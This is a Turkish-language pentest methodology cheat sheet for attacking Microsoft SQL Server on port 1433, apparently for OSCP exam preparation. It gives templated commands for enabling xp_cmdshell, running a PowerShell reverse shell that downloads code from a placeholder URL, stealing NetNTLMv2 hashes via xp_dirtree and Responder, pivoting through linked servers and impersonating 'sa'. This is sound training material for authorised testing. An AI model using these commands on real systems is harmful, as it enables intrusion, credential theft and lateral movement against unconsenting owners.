FOOTHOLD Metodoloji Cheat-sheet
1433

MSSQL (Microsoft SQL Server)

windows

1433 MSSQL enumeration ve exploitation: impacket-mssqlclient (SQL/Windows auth), xp_cmdshell ile RCE, linked servers ile pivot, xp_dirtree ile NetNTLM hash calma.

┌──

Komutlar

nmap ✓ EXAM-SAFE
nmap -p1433 -sV --script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password {{RHOST}} -oN mssql_enum.txt
MSSQL sürüm/instance, NTLM bilgisi (hostname/domain) ve bos sa parolasi kontrolu. HackTricks — Pentesting MSSQL
netexec ✓ EXAM-SAFE
netexec mssql {{RHOST}} -u {{USER}} -p {{PASS}} --local-auth
MSSQL SQL-auth (local) kredensiyal dogrulama; domain auth icin --local-auth kaldirilir. NetExec Wiki — MSSQL Protocol
impacket-mssqlclient ✓ EXAM-SAFE user
impacket-mssqlclient {{USER}}:{{PASS}}@{{RHOST}} -windows-auth
Windows authentication ile MSSQL shell; AD hesabi ile baglanir. WADComs — impacket-mssqlclient
impacket-mssqlclient ✓ EXAM-SAFE user
impacket-mssqlclient {{USER}}:{{PASS}}@{{RHOST}}
SQL authentication ile baglanma (sa veya sql login); default SQL-auth. WADComs — impacket-mssqlclient
impacket-mssqlclient ✓ EXAM-SAFE user
impacket-mssqlclient {{DOMAIN}}/{{USER}}@{{RHOST}} -k -no-pass
Kerberos (ccache) ile MSSQL auth; -k -no-pass ile mevcut ticket kullanilir. HackTricks — Pentesting MSSQL (Kerberos)
mssql ✓ EXAM-SAFE user
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
xp_cmdshell'i etkinlestirir (sysadmin gerekir); sonrasinda OS komut calistirma acilir. HackTricks — Pentesting MSSQL (xp_cmdshell)
mssql ✓ EXAM-SAFE user
EXEC xp_cmdshell 'whoami';
MSSQL servis hesabi (genelde NT Service\\MSSQLSERVER, sik SeImpersonate'li) baglaminda OS komut. HackTricks — Pentesting MSSQL (xp_cmdshell)
impacket-mssqlclient ✓ EXAM-SAFE user
xp_cmdshell powershell -e {{URL}}
impacket shell ici stub: xp_cmdshell ile PowerShell reverse shell / payload (base64 veya IEX download). HackTricks — Pentesting MSSQL (xp_cmdshell)
mssql ✓ EXAM-SAFE user
EXEC master..xp_dirtree '\\{{LHOST}}\\share\\x', 1, 1;
MSSQL servis hesabini saldirgan SMB'sine baglatip NetNTLMv2 hash'ini calar (Responder ile yakala). HackTricks — Pentesting MSSQL (xp_dirtree / NTLM theft)
responder ✓ EXAM-SAFE
sudo responder -I {{INTERFACE}}
xp_dirtree/xp_subdirs ile tetiklenen MSSQL servis hesabi NetNTLMv2 hash'ini yakalar. HackTricks — Responder
mssql ✓ EXAM-SAFE user
EXEC sp_linkedservers; SELECT * FROM master..sysservers;
Linked server'lari listeler; pivot ve yetki yukseltme (trustworthy/impersonate) icin kesfedilir. HackTricks — Pentesting MSSQL (Linked Servers)
mssql ✓ EXAM-SAFE user
EXEC ('sp_configure ''xp_cmdshell'',1; RECONFIGURE; EXEC xp_cmdshell ''whoami''') AT [LINKED-SQL];
Linked server uzerinde uzaktan komut calistirma (RPC out acik ise); ikinci sunucuya pivot. HackTricks — Pentesting MSSQL (Linked Servers RCE)
mssql ✓ EXAM-SAFE user
EXECUTE AS LOGIN = 'sa'; SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER('sysadmin');
Impersonation (IMPERSONATE ANY LOGIN) ile sa'ya yukselme; ardindan sysadmin teyidi. HackTricks — Pentesting MSSQL (Privilege Escalation)

MSSQL (1433) Genel Bakis

Microsoft SQL Server, OSCP ortaminda hem foothold (xp_cmdshell ile RCE) hem privilege escalation (servis hesabinin SeImpersonate’i -> Potato) hem de lateral movement (linked servers, NetNTLM hirsizligi) saglayan cok yonlu bir hedeftir.

Enumeration

  • nmap NSE: ms-sql-info (instance/sürüm), ms-sql-ntlm-info (hostname/domain sizdirir), ms-sql-empty-password (bos sa parolasi).
  • netexec mssql ile kredensiyalleri dogrulayin; SQL-auth icin --local-auth, domain hesaplari icin bu bayragi cikarin. (Pwn3d!) cikti sysadmin’i gosterir.

Kimlik Dogrulama

  • SQL auth: impacket-mssqlclient {{USER}}:{{PASS}}@{{RHOST}} (orn. sa).
  • Windows auth: ayni komuta -windows-auth ekleyin (AD hesabi).
  • Kerberos: -k -no-pass ile mevcut ccache ticket.

xp_cmdshell ile RCE

Sysadmin iseniz sp_configure ile xp_cmdshell’i etkinlestirip OS komut calistirin. Komutlar SQL Server servis hesabi baglaminda calisir; bu hesap cogu zaman SeImpersonatePrivilege tasir — yani whoami /priv ile teyit edip Potato (PrintSpoofer/GodPotato) zinciriyle SYSTEM’e cikabilirsiniz. Reverse shell icin xp_cmdshell uzerinden base64 PowerShell veya IEX(New-Object Net.WebClient).DownloadString({{URL}}) calistirin.

NetNTLM Hash Calma (xp_dirtree)

Sysadmin olmasaniz bile (sadece public+yeterli izin), xp_dirtree/xp_subdirs/xp_fileexist ile MSSQL servis hesabini saldirgan SMB sunucunuza (\\{{LHOST}}\\share) baglatabilirsiniz. responder -I {{INTERFACE}} ile yakalanan NetNTLMv2 hash’i offline kirilabilir (hashcat -m 5600) veya relay edilebilir. Bu, MSSQL’den AD’ye gecmenin klasik yoludur.

Linked Servers (Pivot + Privesc)

  • sp_linkedservers / master..sysservers ile baglanti zincirlerini listeleyin.
  • RPC Out acik linked server’larda EXEC (...) AT [SERVER] ile uzak sunucuda komut calistirip pivot yapin.
  • Linked server kredensiyali genelde yuksek yetkili (hatta sa) maplenmis olur — bu sayede dusuk yetkili bir login bile zincirin sonunda sysadmin’e ulasabilir.

Privilege Escalation (DB ici)

  • IMPERSONATE ANY LOGIN veya belirli login impersonation hakki varsa EXECUTE AS LOGIN = 'sa' ile sysadmin’e yukselin (IS_SRVROLEMEMBER('sysadmin') ile teyit).
  • TRUSTWORTHY ON olan veritabanlari db_owner’dan sysadmin’e tirmanma firsati verir.

Loot / Notlar

  • DB icerigi: SELECT name FROM master.sys.databases; ile veritabanlarini, ardindan tablolari (kredensiyal/hash) tarayin.
  • xp_cmdshell calismazsa sp_OACreate (OLE Automation) alternatif RCE yoludur.
  • Tüm bu adimlar OSCP-safe; sadece otomatik MSF exploitation kullanmaktan kacinin.
┌──

İlgili teknikler

Impacket Suite: PsExec/WMIExec/SMBExec, Secretsdump, Kerberos Saldirilari ve NTLM RelaySeImpersonate / SeAssignPrimaryToken Abuse — Potato Ailesi (PrintSpoofer, RoguePotato, JuicyPotatoNG, GodPotato, EfsPotato)Saklanan Kimlik Bilgileri — cmdkey, Unattend, GPP, Credential Manager, SAM
┌──

Kaynaklar

↗ HackTricks — Pentesting MSSQL↗ WADComs — impacket-mssqlclient↗ NetExec Wiki — MSSQL Protocol
0/15 set